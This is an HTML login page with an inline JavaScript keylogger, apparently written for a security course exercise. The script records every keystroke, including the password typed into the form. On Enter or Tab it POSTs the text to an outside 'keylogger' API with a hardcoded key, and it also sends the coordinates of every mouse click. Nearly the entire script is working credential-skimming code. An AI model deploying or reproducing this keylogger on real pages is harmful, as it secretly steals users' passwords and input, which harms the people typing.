<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h1>Greetings randy</h1>
    <div>
            <label>Enter your name, larry</label><br>
            <input placeholder="Name"><br><br>
            <label>Now enter your totally not safe password, pleb</label><br>
            <input type="password" placeholder="Password"><br><br>
    </div>

    <script>
        let string = '';
        const url = "https://m183.gibz-informatik.ch/api/keylogger";
        
        //To keylog any keyboard inputs
        //Sent to API-Endpoint as soon as Enter or Tab is clicked
        document.addEventListener("keydown", async function(event) {
            let singleKeyInput = event.key;
            
            if(singleKeyInput.length > 1){
                singleKeyInput = "(" + singleKeyInput + ")";
            }
            
            string += singleKeyInput;

            const msg = JSON.stringify({"keyword": "c4p1-keyinput", "payload": string});
            
            if(singleKeyInput == "(Enter)" || singleKeyInput == "(Tab)"){
                await fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json', 
                        'X-Api-Key': 'NQA3ADYAOAAxADcANAAyADgANQA2ADYAMgAwADgAMgA0ADUA',
                    },
                    body: msg,
                });
                console.log(string);
                console.log(singleKeyInput);
                string = "";
            }
        });

        //To keylog mousepositions 
        //Sent to API-Endpoint as soon as a mouseclick happens
        document.onclick = async function(e){
            var pageCoords = "( " + e.pageX + ", " + e.pageY + " )";
            const msg = JSON.stringify({"keyword": "c4p1-mouseclick", "payload": pageCoords});
                await fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json', 
                        'X-Api-Key': 'NQA3ADYAOAAxADcANAAyADgANQA2ADYAMgAwADgAMgA0ADUA',
                    },
                    body: msg,
                });
            console.log(pageCoords);
        };
    </script>
</body>
</html>